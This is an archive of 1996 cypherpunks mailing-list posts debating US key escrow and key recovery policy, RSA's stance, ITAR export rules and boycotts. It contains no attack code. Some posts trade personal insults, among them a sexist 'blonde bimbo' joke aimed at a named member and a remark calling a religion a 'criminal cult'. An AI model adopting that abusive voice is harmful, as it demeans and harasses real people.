what is the precise difference between gack, key escrow, and
key recovery?
  [and]

I'll be watching the debate closely, as the true extremists
incapable of compromise (and thereby living in a fantasy world)
show their colors....
...............................................................................


The precise difference is:  who is in control.

In order to understand this critical point you must understood the idea of having personal authority as a standard for living.  But you would expect that everyone should accept being subject to inspection by default, as if governments owned everyone within the national boundaries and keeping personal things away from them were a sin.

The more that governments obliterate the lines of division between what is exclusively one's own to manage and what they have "the right" to share in (including holding your extra keys) or to demand (access to private communication), the less defined the concept of individuality becomes (as compared to being a "borg" of the State) and the more difficult it becomes intellectually to uphold one's separateness from it, since it all seems to be the same, undifferentiated control over things in general ("we are all One - how could you object?").  

It is right to resist any attempts by the State to assimilate everyone into its fold by blurring the boundaries of authority (in its favor).   It is a better thing to strengthen each individual's ability to maintain their own, than to put them in a situation where they *must* use the assistance of (become dependent upon) the (supposed) benevolence and rational judgement of an overwhelming overseer.  

It is better to reserve the right of authority over who & when anyone may keep one's software keys in escrow.  It is better than to forfeit the right to make that decision on one's own good time and according to one's own plan, which would otherwise weaken that authority.   

   ..
Blanc
[If 51% of the true extremist voters would elect Harry Browne, GAK would not be a problem.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 4 Oct 1996 16:42:45 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Did Sun get a sweetheart deal?
In-Reply-To: <Pine.3.89.9610031804.A16004-0100000@netcom14>
Message-ID: <199610040512.AAA00647@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Green wrote:
> On Thu, 3 Oct 1996, Ernest Hua wrote:
> >   Sun Microsystems Inc. said Wednesday it received two contracts from
> >   NASA's Goddard Space Flight Center worth a total of $100 million. The
> >   Mountain View-based company said the pact calls for software
> >   development and the design about 34,000 computer-aided engineering
> >   and design workstations. NASA will use the workstations to design
> >   integrated circuits.
> 34,000 Sun workstations? If any of the software designers from Sun are 
> reading this, I would like to make a suggestion as to the screensaver 
> that will ship with every workstation.
 
     Would that bring the crack down to under a month? 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 5 Oct 1996 01:25:50 +0800
To: cypherpunks@toad.com
Subject: RSA's Official Permission
Message-ID: <Pine.LNX.3.94.961004013154.572A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------

   RSA Optimistic on User Benefits of Administration's Recent Key
   Recovery Initiative Announcement Further policy change required for US
   vendors to be competitive worldwide
   
   
   
   REDWOOD CITY, Calif.---Oct. 2nd, 1996--RSA Data Security, Inc., a
   wholly-owned subsidiary of Security Dynamics Technologies, Inc.
   (NASDAQ: SDTI), issued the following comments on the administration's
   recent announcement of a Key Recovery Initiative:
   
   
   The administration's proposed Key Recovery Initiative is a positive
   step towards meeting the needs of individuals and organizations that
   buy and use products which utilize encryption. However, the proposal
   leaves significant competitive issues unresolved for suppliers who
   compete overseas.
   
   
   Modern encryption and authentication technologies are crucial to the
   growth of electronic commerce and the health of the future global
   electronic economy. The continued leadership of American computer and
   software firms in the world market depends on their ability to provide
   competitive solutions for consumers and business around the world.
   These consumers and businesses depend increasingly on encryption and
   authentication technologies -- such as those developed at RSA -- to
   provide solutions that protect the privacy of consumer purchases,
   personal medical information, sensitive corporate data, and electronic
   commerce and funds transfers as they travel over the global Internet.
   
   
   US government agencies, however, have long insisted that they must
   have potential access to all encrypted information for law enforcement
   purposes, and have advanced several proposals towards those ends.
   
   
   To date, these proposals have met with little support from the user
   and vendor communities due to concerns about privacy and
   competitiveness. This new proposal from the administration, however,
   is a move in the right direction for users.
   
   
   One positive step is that the administration has indicated, for the
   first time in over six years of discussion, that it will lift all key
   size restrictions on the export of products which utilize
   cryptography, provided that manufacturers provide a viable means of
   key recovery for legitimate government access.
   
   In addition, under the administrations proposal, industry, not
   government, will develop and propose the actual key recovery
   mechanisms. This will to result in more effective solutions to
   managing and recovering keys.
   
   
   Finally, the proposal addresses the concerns of users that any third
   party designated to hold user keys might improperly disclose those
   keys, thereby compromising a user's right to privacy. The
   administration has agreed that under certain circumstances,
   organizations would be allowed to "self-escrow" their own encryption
   keys.
   
   
   RSA is confident that industry can develop and gain approval for
   several excellent key recovery mechanisms that would be acceptable to
   government concerns. In fact, RSA has been a pioneer in this field
   with our RSA Emergency Access(tm) technology in its award-winning RSA
   SecurPC(tm) product. In the case of SecurPC, companies using the product
   can use Emergency Access keys with RSA's unique secret-splitting
   technology to gain access to critical information in the event of an
   emergency.
   
   
   The recently announced Key Recovery Alliance, of which RSA is a part,
   is chartered to provide a flexible, workable solution for users
   working within the government's proposed key recovery framework.
   Members of the group are working on technology which will allow users
   to maintain the privacy of their keys while allowing legitimate
   business or law enforcement authorities to recover keys when
   appropriate. It will also address challenges that arise when a user
   must comply with the differing encryption policies in countries around
   the world. The technology could allow products to provide the
   flexibility a user needs to take full advantage of the maximum privacy
   allowed in their locality, while maintaining interoperability and
   information exchange with other users regardless of location.
   
   
   It is not clear, however, to what extent the administration's proposal
   provides relief to US software and hardware companies who must compete
   with foreign suppliers. These foreign suppliers, not subject to US
   law, can provide strong, non-key-recovery encryption in their
   products.
   
   
   Today, most major computer and software solutions firms derive
   significant revenues from outside the United States. The government's
   proposal, while satisfying the US government's needs, does little to
   enhance the competitiveness of American products overseas. Robust
   encryption products are already available from many overseas
   suppliers, and U.S. market share in encryption-enabled products is
   under siege. Under this proposal, it appears that U.S. companies will
   still be prohibited from selling non-key-recovery encryption solutions
   in overseas markets, creating a significant barrier to their
   competitiveness.
   
   
   RSA looks forward to additional announcements by the administration
   that specifically address this issue and provide competitive relief
   for the US computer software and hardware industries.
   
   
   
   RSA Data Security, Inc.
   
   
   RSA Data Security, Inc., a wholly-owned subsidiary of Security
   Dynamics Technologies, Inc. (NASDAQ: SDTI), is the world's brand name
   for cryptography, with more than 75 million copies of RSA encryption
   and authentication technologies installed and in use worldwide. RSA
   technologies are part of existing and proposed standards for the
   Internet and World Wide Web, ITU, ISO, ANSI, IEEE, and business,
   financial and electronic commerce networks around the globe. The
   company develops and markets platform-independent developer's kits and
   end-user products and provides comprehensive cryptographic consulting
   services.
   
   
   Founded in 1982 by the inventors of the RSA Public Key Cryptosystem,
   the company is headquartered in Redwood City, Calif.
   
   
   -0-
   
   
   Note to Editors: BSAFE and TIPEM are trademarks of RSA Data Security,
   Inc. All other product and brand names are trademarks or registered
   trademarks of their respective companies.
   
   
   
   | [1]Al Gore's Statement | [2]Jim's Testimony | [3]IBM's Alliance |
   
   
   CONTACT:
   
   
   Corman/Croel
   
   Marketing & Communications (for RSA)
   
   Patrick Corman, 415/326-9648
   
   [4]corman@cerfnet.com


---------- End Forwarded message ----------

This is definatly bad... 

If you want to look it up yourselves, its at

http://www.rsa.com/PRESSBOX/releases/keyrecov.htm


 --Deviant
They seem to have learned the habit of cowering before authority even when
not actually threatened.  How very nice for authority.  I decided not to
learn this particular lesson.
                -- Richard Stallman








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 4 Oct 1996 19:15:06 +0800
To: cypherpunks@toad.com
Subject: Esther Dyson: Pro-crypto in Poland
Message-ID: <Pine.SUN.3.95.961004014538.17005B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm in Warsaw doing some consulting for a local ISP and got invited to an
Internet conference last night  targeted toward government ministry
officials.  Even though I speak no Polish, I decided to go because Esther
Dyson was one of the keynotes.

The three day conference is being held outside of Warsaw.  The location
has to be one of the most unique conference settings I've ever seen.  How
about in a classroom of what appeared to be the government police training
barracks.  Guarded gates, barking German shepherds in kennels, and armed,
marching cops in camo fatigues.  Interesting.  Got to suggest it to the
DefCon folks instead of Vegas.

Anyway, not knowing what Esther was going to talk about, I started to
smile when she launched into a very pro-crypto (as in anti-key escrow)
presentation.  Through a translator, she did a good job of covering most
of the issues near and dear to Cypherpunks's hearts.  She closed with
urging the Polish officials to make their own decisions regarding privacy
and crypto, and not be swayed by the actions of the US government.

Someone in the audience asked what the average American thought of the
ongoing crypto controversy.  Esther answered correctly, that they're
mostly clueless.  Of course I had to stand up and mention the grassroots
Cypherpunk efforts just to let folks know not everyone besides EFF is idly
standing by (I think my host did a pretty good job of translating).
Esther's comment was that Cypherpunks weren't average.  You decide if that
was a compliment or not.

I don't know.  Despite the bashing she got on the list about anonymity, I
was impressed.  Presenting the issues  in a very logical and rational
manner to government officials in "crypto-neutral" territory counts for
something in my book.

Anyway, based on all of the nonsense going on in the US, it's interesting
to be in an environment where there are strong concerns about privacy and
government abuses by the average citizen.  I think Americans have taken
for granted many things, that only living under a repressive regime would
make them appreciate.

Joel






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 4 Oct 1996 19:57:49 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Did Sun get a sweetheart deal?
In-Reply-To: <199610040109.SAA23900@slack.lne.com>
Message-ID: <Pine.SUN.3.91.961004014916.22864A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Eric Murray wrote:
> In addition, I had lunch today with the people I used to work
> with/for at Sun, who're probably the most likely to be asked to implement
> such a thing.  They haven't heard anything about it and were quite dismayed
> at the whole idea.

I'd love to know what John Gage says about this, since in the past I 
believe he's used been "Over My Dead Body" on GAK. 

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 4 Oct 1996 19:19:02 +0800
To: cypherpunks@toad.com
Subject: Re: ITAR satellite provision
Message-ID: <3.0b28.32.19961004015418.006b44d0@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, jim bell wrote:

> The wording was 
> clearly intended to be an exception to a rule.  What the wording doesn't 
> include is the "exception to the exception," most likely because they 
> weren't thinking in too great a detail when they wrote the regulations.

Yow. The "if we put it in a rocket it's exportable" interpretation made me
think twice before posting the text of that definition, because it's
seductive and wrong. I posted it because it's amusing to think about and
because we all had a good laugh about it at the Mac crypto conference; but
I'd feel like a jerk if someone got themselves in a lot of trouble with an
enthusiastic misreading of that sentence out of pages and pages of
regulations (plus quite a few more pages of opinions interpreting those
regulations). 

> It appears that the government left a loophole so large that  you could 
> drive a truck...er...shoot a rocket through it.

If you think you've found an enormous loophole in a regulation which has
been around for 15-20 years, you should double-check your research and get
a good nights' sleep. Law is like science this way - if you think you have
found room-temperature fusion you should stop and check your work. It's
much more likely that you're not reading carefully or you've missed something.

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 4 Oct 1996 19:31:09 +0800
To: Peter Trei <trei@process.com>
Subject: Re: RSA's position on espionage-enabled crypto.
In-Reply-To: <199610032013.NAA23928@toad.com>
Message-ID: <Pine.LNX.3.94.961004015948.647A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Peter Trei wrote:

> Date: Thu, 3 Oct 1996 16:14:34 -6
> From: Peter Trei <trei@process.com>
> To: cypherpunks@toad.com
> Subject: RSA's position on espionage-enabled crypto.
> 
> RSA has put up a 'position statement' on clipper 4 at their home
> page at www.rsa.com. 
> 
> They're  not rejecting it, but are clearly not wildly pro-GAK either. It's
> clearly early days yet.
> 

Hrmm.. when I read and forwarded it to the list (about 10 minutes ago
now), it seemed to be a "we think its a good thing" type of statement...

 --Deviant
Art is a lie which makes us realize the truth.
                -- Picasso






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Klaus E. vonEbel" <unicorn@schloss.li>
Date: Fri, 4 Oct 1996 18:56:35 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <199610032109.OAA11555@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961004030915.22941A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, jim bell wrote:

> At 02:05 PM 10/3/96 -0400, Michael Froomkin - U.Miami School of Law wrote:
> >Alas, a common fallacy.
> >
> >You have committed a prohibited export when the stuff lands outside the
> >USA....It's not illegal when it goes up ("by reason of the launching" and,
> >e.g. *stays up* in orbit)  but it is illegal when it comes down abroad. 
> 
> Sure about that?  The regulation said something like "launch vehicle" or 
> "launch," apparently indicating that a "launch vehicle" could actually be 
> exported, THEN launched, etc, without violating ITAR.  And since the 
> regulation does not go into any detail about the "launch", other than it is 
> a "launch" (and does not explicitly prohibit landing subsequent to launch) 
> the implication is that there is no prohibition.
> 
> I still think the regulation was just written sloppily.   

Thankfully, you're not an attorney.

> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 5 Oct 1996 00:51:14 +0800
To: Petr Snajdr <snajdr@pvt.net>
Subject: Re: WINDOWS NT ????
Message-ID: <199610041241.FAA12482@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:47 PM 10/3/96 +1030, you wrote:
>hi,
> is Windows NT secured system ?

Windows NT 3.51 is a real operating system.  It is not as secure
as I would like, but it is much better than Windows 3.1, which was
totally insecure.  It has some good security techniques,
but I don't know how secure the networking is, and networking
is the big technical insecurity on most machines today.  
(Well, bad administration is the biggest insecurity on almost all 
machines for almost all time.  And physical security is also big.)

Windows 4.x moves the graphics/windowing system into Ring 0,
where the "secure" parts of the kernel are.  Bad.
This means graphics bugs can make the kernel insecure or crash.
I don't trust it, especially because Windows 3.1 crashes all the time
for me, and stupid bugs make Windows 3.1 behave badly for me.
So if they put the window system in the kernel, I don't trust it.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
America's Open Presidential Debate - Beyond Dole and Clinton!
<A href="http://gate.net/~bdcollar/bbe/debate.htm">Tuesday, Oct. 8th 8:00 PM
EDT</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 5 Oct 1996 00:29:33 +0800
To: cypherpunks@toad.com
Subject: Re: The New GAK-Clipper Thing will Fail
Message-ID: <199610041241.FAA12497@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:07 PM 10/3/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>The point, of course, is NOT to encourage these companies to support Clipper 
>IV.  Rather, goal is to suggest to them a "poison pill" which would make 
>their cooperation meaningless in the end, while at the same time giving them 
>a 2-year free 56-bit export.  Think of it as a monkey-wrench they can throw 
>into the works.

A really _fine_ post!  I'm also impressed by the way they announced it
just _after_ Congress ended its session, while they're busy losing the export
level in court.

On the other hand, boycotts aren't particularly useful, when 
RSA (who is or is not joining the Bad Guys) owns half the public key patents and
Cylink (who definitely is) owns the other half.  If you're selling public key,
you've got to pay the Bad Guys, until the DH patents expire in 97 (later for
RSA.)
Or you've got to buy from somebody who's paying the Bad Guys.

And the Bad Guys Unindicted Co-Conspirators' announcements haven't even
_mentioned_ permitting export of public key technology (since 56-bit RSA
doesn't quite make it.)  But they _could_ export Kerberos, with only
minor hacks needed to implement Key Ripoff.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
America's Open Presidential Debate - Beyond Dole and Clinton!
<A href="http://gate.net/~bdcollar/bbe/debate.htm">Tuesday, Oct. 8th 8:00 PM
EDT</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 5 Oct 1996 00:52:36 +0800
To: Adamsc <Adamsc@io-online.com>
Subject: Re: ADJ_ust
In-Reply-To: <19961004020539265.AAD223@GIGANTE>
Message-ID: <Pine.3.89.9610040641.A14153-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 2 Oct 1996, Adamsc wrote:

> I have strong
> doubts that someone would come up with a non-nuke that could destroy stuff
> indiscriminately within a useably large area.

Fuel/air bombs.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Fri, 4 Oct 1996 18:42:42 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: gack vs. key escrow vs. key recovery
In-Reply-To: <199610040033.RAA18660@netcom19.netcom.com>
Message-ID: <Pine.3.89.9610040435.E1896-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 3 Oct 1996, Vladimir Z. Nuri wrote:
> 
> it is clear we are coming to a fork in the road at this moment.
> there are going to be two types of cpunk opinions based on recent
> developments.
> 
> 1. those who feel that wiretapping was illegitimate from the
> start and are working to make wiretapping impossible. confronted
> with a legal search warrant/subpoena etc. for personal data, 
> they would not hand over keys. they would "superencrypt" in
> systems that do etc.
> 
> 2. those who feel that there is such a thing as a legal warrant
> or subpoena for information protected by cryptography keys, and
> would agree that this logically means that governments will be
> getting access to "key recovery" infrastructures.
> 

If I correctly understand what you are saying, I agree with your thesis 
that people who are stuck in an antiestablishment frame of mind may just 
as easily hinder their own cause by acting blindly.

But if we make a distinction between two very different levels and types 
of wiretapping, I believe a sizeable third category becomes apparent:

3. Those who are aware of the existence of large-scale systems of
electronic monitoring by the NSA, which does not need any search
warrant or subpoena of any kind to collect, archive, index, correlate, 
interpret & summarize the supposedly private communications of all of us.

When presented with an actual search warrant, people who have this 
awareness would typically cooperate with any law enforcement agencies, 
since they would also be aware of how impractical noncooperation would 
be.  Far from considering the government as always bad, they may only 
have a healthy mistrust of those branches of big government which can 
operate both above the law and behind a cloak of secrecy.

People in category 3 may be aware of the pure power of knowledge which 
can be extracted from large data mines, and simply desire to exclude as 
much of their personal communications from these mines as possible.  They 
are not comforted by an encryption system where keys could be recovered 
without one's knowledge, and see this as a threat to the current growth 
of truly unbreakable systems.

Former US Senator Dave Durenburger, while still head of the Senate Select 
Intelligence Committee, remarked to the press that he wondered if CIA 
Director William Casey enacted covert plots "just for kicks."

If absolute power corrupts absolutely, is it not our civic duty to 
ensure that the former does not come into being?

Douglas B. Renner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 5 Oct 1996 01:08:44 +0800
To: Adamsc <Adamsc@io-online.com>
Subject: Re: Can we kill single DES?
In-Reply-To: <19961004020539265.AAB223@GIGANTE>
Message-ID: <Pine.3.89.9610040612.A14153-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 2 Oct 1996, Adamsc wrote:

> On Tue, 1 Oct 1996 16:27:18 -6, Peter Trei wrote:
> 
> >1. Is this a good idea? What will happen if DES becomes perceived
> >    as insecure?
> 
> That's Declan's department (and other non-clueless journalists - declan is
> just the most visible).   If it get's widespread and the target is something
> like Digicash, it'd get picked up by the Crime/Snoozeweek crowd.

Sorry, not a chance. The symmetric cipher used in Ecash is 3DES. Since 
DigiCash has the good fortune to be located in The Netherlands, full 
strength crypto can be (and is) used in all their products.

I would advise any company suffering from a loss of competitiveness due to 
US export regulations to do the logical thing and move their operation 
to a more suitable location.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 4 Oct 1996 20:31:08 +0800
To: airhead <cypherpunks@toad.com
Subject: [FUN/GAMES] re: airhead
In-Reply-To: <Pine.3.89.9610032012.A25313-0100000@netcom14>
Message-ID: <199610040731.BAA29702@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


"Deana Holmes" <mirele@xmission.com> writes:
 
-.Sheesh.

-.You know you're doing good when both Dmitri Vulis and Attila both badmouth
-.you.  (For the record, Attila's badmouthing consisted of stating via private
-.email that I was "the same air head pseudo-intellectual who has poisoned 
-.her own life with hatred and ignorance in so many other venues.") 
-.
-.Some people are just terribly threatened, I guess.
-.

        threatened by an airhead?!?   ROTFL

        ...reminds me of the man driving in the country with his blond
     bimbo, when they crest a hill and see YABB in the middle of a
    grazing field rowing a boat, ...absolutely oblivious to all else.
        our fearless BB demands her date stop as they pull abreast of
    the scene; our BB nimbly jumps from the car, runs to the fence
    line, and commences screaming at the YABB who is still rowing
    away with all her heart.
        BB, returning to the car, is asked by her date what she was 
    screaming at YABB.
        "Oh," BB said, "I was sooo mad!  I told her she was a disgrace
    to all blonde [bimbos]; ...and that if I could only swim, I would 
    come out there and thrash her..."

        Go on home, Deana; you have been in one more than too many
    intellectual arguments with only one oar and half the deck.

            --attila    04 10 96 : 06 20 15  UT
    

--
  "Why should I go the circus? 
    Congress is in session."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 5 Oct 1996 03:31:10 +0800
To: cypherpunks@toad.com
Subject: Re: Key recovery/RSA/Bidzos/WTF?!?
Message-ID: <3.0b24.32.19961004062157.0070fcd8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:38 PM 10/3/96 -0700, Declan wrote:
>PC World (at www.pcworld.com) has a radio interview with Bidzos, I'm 
>told, probably in the same story for which they interviewed me.

RSA's "position statement" is at:

http://www.rsa.com/PRESSBOX/releases/keyrecov.htm
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Fri, 4 Oct 1996 22:10:46 +0800
To: cypherpunks@toad.com
Subject: Re: gack vs. key escrow vs. key recovery
In-Reply-To: <199610040033.RAA18660@netcom19.netcom.com>
Message-ID: <199610041141.GAA15744@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199610040033.RAA18660@netcom19.netcom.com>, on 10/03/96 at 05:33 PM,
   "Vladimir Z. Nuri" <vznuri@netcom.com> said:

>regarding (2): the government may actually help bring crypto
>to the masses via the post office and other routes. are
>cpunks going to continue to hold the simplistic, reactionary,
>knee-jerk, black-and-white opinion that "anything with the
>word 'government' in it is evil"? "if the government is doing
>something, then we must sabotage it"?

Hmmmm.... It seems that your are not familiar with the fact that a false sense of
security is WORSE than no security at all. This is exactly what this type of "crypto"
provides: a FALSE sense of security.

The masses are much better off with out any crypto that some sudo-crypto provided by
the government. Atleast when you send messages in the clear the user knows that it is
open for everyone to read and not to send sensitive info.

>I'll be watching the debate closely, as the true extremists
>incapable of compromise (and thereby living in a fantasy world)
>show their colors....

<sigh> another simpleton. Why is it whenever anyone stands up against the "powers
that be" to defend their rights and the Consitution they are branded as "extreamist".
Just which Article of the Bill of Rights should we "compromise" on next? It is
obvious you have no respect for the 1st, 4th & 5th admendments or a clue as to what
they stand for or how they relate to this issue. 

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 5 Oct 1996 01:56:17 +0800
To: Mark Heaney <apteryx@super.zippo.com>
Subject: Re: Fighting Clipper III
In-Reply-To: <325b245d.288509144@super.zippo.com>
Message-ID: <Pine.SUN.3.91.961004062851.28990E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Point taken. And for the record, I've learned that Netscape pays an
upfront fee to RSA; RSA doesn't get royalties. 

-Declan


On Thu, 3 Oct 1996, Mark Heaney wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> erm, a boycott means not _buying_ a product, as opposed to not _using_ a
> product. In the case of PGP, I never intended to purchase it from RSA. As
> for Netscape, there are other browsers out there (or so I heard). 
> 
> Realistically, a boycott is likely to be ineffective. Writing letters to
> companies and congresshmucks and working with non-US crypto companies to
> create a standard that can be legally imported into the US (for now) would
> be more effective, IMHO. Boycotts rely on large numbers of participants,
> and not enough people understand or care about encryption. We'd be better
> off trying to change that first.
> 
> Mark
> 
> 
> On Thu, 3 Oct 1996 06:37:45 -0700 (PDT), Declan McCullagh <declan@eff.org>
> wrote:
> 
> >You'll have trouble doing a successful boycott of RSA. What, you won't 
> >use Netscape Navigator or PGP?
> >
> >-Declan
> >
> >
> >On Wed, 2 Oct 1996, Jim McCoy wrote:
> >
> >> Rich Burroughs <richieb@teleport.com> wrote:
> >> [...]
> >> >>>On Wed, 2 Oct 1996, John Young wrote:
> >> >>>
> >> >>>>    The New York Times, October 2, 1996, pp. D1, D8.
> >> >>>>    Executives of the International Business Machines
> >> >>>>    Corporation said late yesterday that they were still lining
> >> >>>>    up the final list of companies in the alliance. Those
> >> >>>>    involved will include Digital Equipment and smaller
> >> >>>>    data-security companies including RSA Data Security, Cylink
> >> >>>>    and Trusted Information Systems.
> >> >>>
> >> >>>We are in deep trouble.
> >> >>
> >> >>Wouldn't a letter-writing campaign be in order here?
> >> >[snip]
> >> >
> >> >The word "boycott" leaped into my mind.  I personally do not believe that I
> >> >will be buying products from any of these companies, as long as thay
> >> >participate in this GAK charade.
> >> 
> >> Such an initiative will need publicity and letter-writing early in the
> >> campaign will help us set the tone and points of debate on this issue.
> >> A boycott works best when everyone knows why and there are a few key
> >> phrases which can be used to get the message across.  Something like
> >> "company X is helping build big brother, boycott their products" or a
> >> few similar sound bites are needed fast.  The big brother inside stickers
> >> from the last campaign were nice, maybe people can come up with variations
> >> of various corporate logos or marketting phrases which help get the message
> >> across?
> >> 
> >> jim
> >> 
> >> 
> >
> >
> >// declan@eff.org // I do not represent the EFF // declan@well.com //
> >
> >
> >
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQB1AwUBMlQmC936bir1/qfZAQF9dwL/fN1HZhHWbnOa6gZ71WMwf32nuOGS1CGm
> H2f9MlNvZhYF6TVAwCmfUG4hgeJQLkC97GrR/0hIfNYzir0Eb+qmF2Mptvl5tUiJ
> I89H2WRVl+BJBoqThGXJx8BqL6uVDX9H
> =sBVJ
> -----END PGP SIGNATURE-----
> 
> Mark Heaney    finger snipe@starburst.cbl.cees.edu for public key
> PGP Fingerprint= BB D8 9B 07 51 87 05 AC  47 7B F2 4F A6 AB 1A CD   
> -----------------------------------------------------------------
>    Vote against government        ***        Vote Libertarian
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 4 Oct 1996 23:34:19 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
In-Reply-To: <199610040321.WAA00736@manifold.algebra.com>
Message-ID: <oys0uD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> Alan Olsen wrote:
> > I think we should refer to what they are pushing as the "Key Recovery
> > Alliance Program".  K.R.A.P. is a good description as to what we are going
> > to get from them.
>
> Key recovery is a great thing, as long as it is not mandated by
> the government.

Hear, hear.  If I own a computer and some contractor is writing something
on it for me, I should have the right to tell the contractor that I don't
want, e.g., any unlicences software and any data encrypted so that I can't
read it.

Likewise the gubmint or a corporation bigger than mine is free to say that
there should be no data on its computers or its contractors computers that
they can't read.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 4 Oct 1996 23:50:01 +0800
To: cypherpunks@toad.com
Subject: Re: [FACTS] Mountain Meadows Massacre
In-Reply-To: <199610040022.SAA13554@mail.xmission.com>
Message-ID: <BsT0uD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Deana Holmes" <mirele@xmission.com> writes:

> On  3 Oct 96 at 14:42, Dr.Dimitri Vulis KOTM wrote:
>
> > "Deana Holmes" <mirele@xmission.com> writes:
> >
> > <snip mor(m)on propaganda>
> > >
> > > <snip Dmitri Vulis nonsense>
> >
> > No wonder the criminal cult doesn't want its foul deeds subjected to
> > public scrutiny by "dead-agenting" its critics. Is Timmy May a
> > paid cult apologist?
>
> Sheesh.
>
> You know you're doing good when both Dmitri Vulis and Attila both
> badmouth you.

Naw - you're not worth badmouthing - unless you're Timmy May's tentacle.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
